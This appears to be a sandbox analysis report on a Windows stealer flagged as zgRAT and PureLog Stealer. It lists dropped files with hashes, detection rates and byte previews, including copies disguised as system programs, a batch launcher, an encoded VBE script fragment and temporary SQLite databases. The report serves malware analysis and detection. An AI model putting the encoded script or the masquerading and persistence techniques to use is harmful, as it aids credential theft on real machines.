                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\PortCommon\hyperbrokerhostNetsvc.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):91
                                                                                      Entropy (8bit):5.13806713564821
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:gANmwXbEg9oOEE1Kf1KLK6y3KvIWHGL4AE3+Ot:FjLEJEANKLK6y6A/L4AE3+Ot
                                                                                      MD5:9E914413951F28CA613D66A082E6BDF5
                                                                                      SHA1:74C3592959853F6798A62CD735E120412D73445A
                                                                                      SHA-256:9D67C2B67E4BABB2D62C1318BD530C1706A28C7AE662CDF584DD3DA06BA8BB03
                                                                                      SHA-512:B2E17288B6A06C3AE138EFCDF02B9BFC61F7416E109FE4459B9C39B682EED0A303564BE7349E02AF15BC2EEC2C1AE6C1CB347DD7415DE49627FED6BFDF7AE2E3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:%Dto%%hCHNXIroeRQkj%..%PiEVlkkTA%"C:\PortCommon/hyperbrokerhostNetsvc.exe"%sIcFYXRKiGkqOZq%

                                                                                      C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\CJF0Ri1HrG.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):223
                                                                                      Entropy (8bit):5.804094981595838
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:GXkgwqK+NkLzWbHdrFnBaORbM5nCCPF11z75RJNhs:GXkBMCzWLdhBaORbQCCNP5Rhs
                                                                                      MD5:CF90E55A446D37686CB2816D101B5BB7
                                                                                      SHA1:7385714BBDEEA11D6A430803F05A59CCD7D7E5D9
                                                                                      SHA-256:38B60ADC9820B53F1E37C5F17EFD047E523A3F1B1C0486E5FD289D58B65BB5C2
                                                                                      SHA-512:AA74811A63A82D07FAA38512D2FBF119CB4C0A35E10443372FFA153FDE1DDCAF2781C9B11E8DA9FDA8BECB138050587ADFBC57E43E964DF1FE4FB2CAF86DC86F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v X!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zKKDDZWs:KUzJxrY8HW1}c2sd2d;.}^TvWD46#sKjt?J 2{R(lOEBP!S~6ls/.2D0AAA==^#~@.

                                                                                      C:\Program Files (x86)\MSBuild\d6e33f2cde6d42

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:Clarion Developer (v2 and above) memo data
                                                                                      Category:dropped
                                                                                      Size (bytes):35
                                                                                      Entropy (8bit):4.514718016821338
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:LkWEdUFvswu:70UFvswu
                                                                                      MD5:566901FDAAE6FABE8F32D713655ADAEF
                                                                                      SHA1:80941CEA57ABA3536BE7C93D63FAA3E92438416D
                                                                                      SHA-256:96496BCB3CCFD6395904A7680934B84735F37B33E612048DB0D1AF22AEBD284F
                                                                                      SHA-512:F95D8DA4287FC61CB18DB4B9A0779910588AF4464833692A3F986B6138FC539BF334D6FE3627FE338F1FA213D79442B5B5BAC2A62C13A8F05444B86C4D19049E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:M3zis91UMQWi81CGJgHoM1GRkgu64oXHJEK

                                                                                      C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      C:\Program Files (x86)\Windows Photo Viewer\en-GB\d6e33f2cde6d42

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with very long lines (709), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):709
                                                                                      Entropy (8bit):5.8945325949235405
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:onrULHhR4d329VeD3AHKM7+5TGAQNjUZkSoJvZbWvmsQdfK7whtxn:uQLBIG9Ve0HHITZQVUZDqbNfKkhrn
                                                                                      MD5:5E98D2C3028E163EC5915894E8D451DD
                                                                                      SHA1:0A7127E88FCACEEEF7A3B5F7BA7C15B6983AF97D
                                                                                      SHA-256:717BEB24B6E11E452BA626B98D1FF69CD9A7E9ED142B6689D8DBB1F50C3DCFCE
                                                                                      SHA-512:1FD1D1D7A624B7B770F3DC50029158BF3F237982C5E8B1A9405BACEB096C46FE8761FC8652ABB89285D387E5E8EB97553383CA766D0F5A3967993F72AD2D7991
                                                                                      Malicious:false
                                                                                      Preview:adLCWK6YX8Z0dqt8SWJk0BX1PPfpWe48gYvZOiBdMUMfUgewpfffPr0ZFTxGpRC3DaUF5TuuUpXgy2hsvt908ZtzhVU5v4y5RTc3MY0VvvKjTUkMwEV5RM5nreij9z9a1cOfangW2oEMPJfNuHIri2oFYyMr0RV6wus1FFwJh8DmIsYh9Uy2qS18yJHlazgkSHafboHpV9JjzB7paprfddQe2uC58KsrccUAR2FVNJgqIRIxMbLvIAHy16mrlLqLRcHWq6YhjWST7jVklPtg96jbUfIUPYtBcVZqKvGPDnLvsy1RkCFWcJLU3pCKxDSKnQ1lKpazIddWvxtgo1tNTWjSJEwft5b9VAIb7PH5mPN8qzjF5gg6TE1QribF24GMBeBupRjYtylDIkmUfrjNZfpQI1uYyBCrIB7LyzZo6HMedyIG6HkLV3xgyulygKksw34HnagqR5QRSKxUtocqb1WPNaXDNlHwhesj4Acfl43ZnfNn7RF2r3R5ho3MCccqyduycNasL6Fg77msNtG6gOEoNxCPHPcIbNlJuZLt0Wqvxu7kCL9TWfKjZGkpLLl5e7EuVd7yiWFJhT0dzcM6QJv6CBtoyfipvvRzpNOiNKuAZBBGPHzs8ppUMIrUtTADyaXwCBxmOnsFZvgB9nYqpzqGG6ngf3z3KrL9nPDOTNeU6j5amqVG4TX9tRqFXRHUyy4sj

                                                                                      C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      C:\Users\Public\22eafd247d37c3

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):66
                                                                                      Entropy (8bit):5.095466990826778
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:3fmUS08yG/cAdxJAxs2se/V3:3fjayEh+rN/t
                                                                                      MD5:5BE52ADF889121B7D2813589B824954B
                                                                                      SHA1:60AB53C87D2A8346F94175893EB27E77151FC9B1
                                                                                      SHA-256:6B27A6B1788B19FFC2D2F5893DF104003E6813795DEC9CEFABC22C169AA3F9A3
                                                                                      SHA-512:320A004625D40E5722C7733C0A30831588EB498C472F73C4AFBB56AFE2D9D05F552D15A80B2ABD3E5D86D31A1CCDC73F3C1DD5FE2B95C6E58AB467C4E3BB9606
                                                                                      Malicious:false
                                                                                      Preview:YWQCLlTUWLzC1yVxh7MO4Zi2OY4qoxXaSlyezPY5blidhFSPzkuy3kI8yXxxrmqiyZ

                                                                                      C:\Users\Public\TextInputHost.exe

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5964288
                                                                                      Entropy (8bit):4.53470447886868
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:VV7KXp8CLvW3p4I5iONcX0PHTSV9ZPEeAGz0RBiknbaYiF:V48ce3RE0PWFbAXfikmLF
                                                                                      MD5:23710DF1E01CFC3FA04052BA9F873D98
                                                                                      SHA1:D94A2DA61571F7BB2F8A699CBA385AB043C4B26B
                                                                                      SHA-256:AEC8CA62DEA4BC175B0F8AED5A38FDA3E879657B9D1E8DEA0CDCA274C4D1F3D9
                                                                                      SHA-512:946409D67F3D4A5536FC7BC2267A1CC3A5B22334C92B635236282A9C348CC6321910E1052E8D70CC41B67D07BDA422A6DE01423C82C262061D60B3A3C7FCBF66
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\TextInputHost.exe, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\TextInputHost.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                      • Antivirus: Virustotal, Detection: 75%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........+.. ....,...@.. .......................@,...........@.................................P.+.K.....,.p.................... ,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.....,.......+.............@....reloc....... ,.......+.............@..B..................+.....H...................v........!...+......................................0..........(.... ........8........E....)...q...M.......8$...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....~r...{....9....& ....8z...*...0..)....... ........8........E....................o.......8....~....9`... ....~r...{b...:....& ....8........~....(N...~....(R... ....?O... ....~r...{....:....& ....8t......... ....~r...{....:Z...& ....8O...r...ps....z*8.... ....~r...{.

                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperbrokerhostNetsvc.exe.log

                                                                                      Download File
                                                                                      Process:C:\PortCommon\hyperbrokerhostNetsvc.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1698
                                                                                      Entropy (8bit):5.367720686892084
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HmHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1GqZ4x
                                                                                      MD5:1CC465BAC3EF7B2D68EBEDF067EF45EA
                                                                                      SHA1:2C2DEC3CF0CBCCF3B3238ADEB28524C909BA5273
                                                                                      SHA-256:F4604427137BD1C68C5FC6CA6A23DA69977F78ACE88B0C1D3BEBCFA59D64B6F6
                                                                                      SHA-512:EE3CB2F0E3696758A3D7E15D9F2B9436EC7307509259AEF502892AE665F59BC50EA75C47200D73BBA4C90A8C07B5736843CDC75CAA4751531D5541AF934CFE51
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                      C:\Users\user\AppData\Local\Temp\033fqn3cmQ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\08CUWYDnXR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\0S1AuW3efK

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\0Un3Kw40an

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\0ai5qmGcKE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\0ihKRVV5nh

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\0xAgFwENCH

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\15YyLgZ6Bp

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

